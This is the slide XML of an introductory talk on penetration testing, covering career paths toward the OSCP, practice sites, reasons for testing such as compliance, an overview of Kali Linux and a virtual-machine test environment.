            <a:pPr indent="-273050" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="700"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="700"/>
              <a:t>It’s good to mention these things for exposure, but we should really stick to this basics on this one… do a really awesome demonstration where you can explain things on a level that the audience understands. This also helps for your own good because you can simplify your descriptions (ACCURATELY), which means you are getting a better understand of the material in the process</a:t>
            </a:r>
            <a:endParaRPr sz="700"/>
          </a:p>
          <a:p>
            <a:pPr indent="-273050" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="700"/>
              <a:t>Find Quellen über das OSCP (vielleicht…)</a:t>
            </a:r>
            <a:endParaRPr sz="700"/>
          </a:p>
          <a:p>
            <a:pPr indent="-273050" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="700"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="700"/>
              <a:t>Potential path: Overthewire -&gt; Vulnhub -&gt; hackthebox -&gt; Pen Testing with Kali Linux (required) -&gt; 24 hr OSCP exam</a:t>
            </a:r>
            <a:endParaRPr sz="700"/>
          </a:p>
          <a:p>
            <a:pPr indent="-273050" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="700"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="700"/>
              <a:t>Root as many VMs as you possibly can out of ~55</a:t>
            </a:r>
            <a:endParaRPr sz="700"/>
          </a:p>
          <a:p>
            <a:pPr indent="-273050" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="700"/>
              <a:t>GO INTO BUSINESS APPLICATION OF THIS FIELD AND WHAT KIND OF THINGS YOU DO ON THE JOB WITH THIS BECAUSE NO ONE EVER TALKS ABOUT THIS god bless america. Even dan’s presentation didn’t quite hit home on this though it was still helpful. More govie sec analyst focused tbh</a:t>
            </a:r>
            <a:endParaRPr sz="700"/>
          </a:p>
          <a:p>
            <a:pPr indent="-273050" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="700"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="700"/>
              <a:t>Become a pen tester for a specific company (walmart) or just become a contractor / tool vendor / consultant and HACK THE PLANET</a:t>
            </a:r>
            <a:endParaRPr sz="700"/>
          </a:p>
          <a:p>
            <a:pPr indent="-273050" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="700"/>
              <a:t>Do cool shit. But it can evolve into much more than just being a pen tester. Sec engi / architect one day</a:t>
            </a:r>
            <a:endParaRPr sz="700"/>
          </a:p>
          <a:p>
            <a:pPr indent="-273050" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="700"/>
              <a:t>Multiple sec engis / architects in one company. Big ass company that uses a LOT of products? You have people that dedicated that learning the ins and outs of that product to protect the org. (story about FoxT BoKS, FireEye, CyberArk) They make the security virtual infrastructure. They ALL work together. Teamwork is extremely important! And comms! NEED MORE COMMS</a:t>
            </a:r>
            <a:endParaRPr sz="700"/>
          </a:p>
          <a:p>
            <a:pPr indent="-273050" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="700"/>
              <a:t>Gather your data. Put it in a database / data warehouse. Test to see how well you’re doing. Are these products working? Comm that to the business. Similar to the pen testing example. Comm that to your business to make sure they understand what this is doing for them so they see value for paying for this service. OR, on the other hand, let it be known to the business units that this product isn’t working out, and suggest a new product or use open source software</a:t>
            </a:r>
            <a:endParaRPr sz="700"/>
          </a:p>
          <a:p>
            <a:pPr indent="-273050" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="700"/>
              <a:t> honestly just become the CISO in 20 years 4Head</a:t>
            </a:r>
            <a:endParaRPr sz="7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250" name="Google Shape;250;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t>Ronni Wilkinson’s CSCE 518 class (only taught in the fall)</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t>Malcolm Shore’s Kali Linux Tutorials </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" u="sng">
                <a:solidFill>
                  <a:srgbClr val="A4C2F4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" u="sng">
                <a:solidFill>
                  <a:srgbClr val="A4C2F4"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://lynda.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" u="sng">
                <a:solidFill>
                  <a:srgbClr val="A4C2F4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</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4"/>
              </a:rPr>
              <a:t>https://information.rapid7.com/what-is-penetration-testing-whitepaper-reg.html</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5"/>
              </a:rPr>
              <a:t>http://nymag.com/thejob/2017/03/penetration-tester-cybersecurity-interview.html</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6"/>
              </a:rPr>
              <a:t>https://infosecuritygeek.com/my-oscp-journey/</a:t>
            </a:r>
            <a:endParaRPr sz="1100" u="sng">
              <a:solidFill>
                <a:srgbClr val="A4C2F4"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100" u="sng">
                <a:solidFill>
                  <a:srgbClr val="A4C2F4"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>https://github.com/SpiderLabs/social_mapper</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8"/>
              </a:rPr>
              <a:t>http://overthewire.org/wargames/</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9"/>
              </a:rPr>
              <a:t>https://www.vulnhub.com/#</a:t>
            </a:r>
            <a:endParaRPr sz="1100" u="sng">
              <a:solidFill>
                <a:srgbClr val="A4C2F4"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100" u="sng">
                <a:solidFill>
                  <a:srgbClr val="A4C2F4"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>https://www.hackthebox.eu/</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <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What is Penetration Testing?</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="3C78D8"/>
              </a:solidFill>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Acting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> as an attacker to identify security gaps in a computer infrastructure</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>“Quality assurance”</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Authorization. Do you have it?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Also known as:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Pen Testing</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Security Assessment</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Red Team</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Ethical Hacking</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="73" name="Google Shape;73;p15"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7221099" y="194627"/>
            <a:ext cx="1611200" cy="957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Why?</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="3C78D8"/>
              </a:solidFill>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Prevent data breaches</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Check security controls</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Ensure security of new applications</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Developers using bad code</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Acquire a baseline for a security program</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Compliance (</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t>especially</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> with the government)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>STIGs (Security Technical Implementation Guides)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:srgbClr val="A4C2F4"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://iase.disa.mil/stigs/Pages/index.aspx</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Who else will? Bad guys</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>You don’t get reports from them...</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="80" name="Google Shape;80;p16"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7537750" y="252475"/>
            <a:ext cx="1294550" cy="1630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Jake</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="86" name="Google Shape;86;p17"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2472637" y="472387"/>
            <a:ext cx="4198725" cy="4198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Jake, the Professional Burglar</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="92" name="Google Shape;92;p18"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2409825" y="409575"/>
            <a:ext cx="4324350" cy="4324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1230425" y="472126"/>
            <a:ext cx="6683149" cy="4199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Kali Linux</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="3C78D8"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="103" name="Google Shape;10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Debian-derived Linux distribution for penetration testers</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Bread and butter</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Released in 2013 by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:srgbClr val="A4C2F4"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Offensive Security</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Started as BackTrack (Knoppix-derived)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Runs on a wide-range of hardware</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>600+ pre-installed security testing tools</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Separated into categories</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="104" name="Google Shape;104;p20"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="10">
            <a:off x="5402124" y="2092030"/>
            <a:ext cx="3094824" cy="231694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Test Environment</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="3C78D8"/>
              </a:solidFill>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t>Virtualization</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> - at a basic level, computers within a computer</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Referred to as virtual machines (VMs)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Using a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng"/>
              <a:t>hypervisor (VMware Workstation Pro)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> to host guests operating system</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="111" name="Google Shape;111;p21"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2503000" y="2244876"/>
            <a:ext cx="4138000" cy="2583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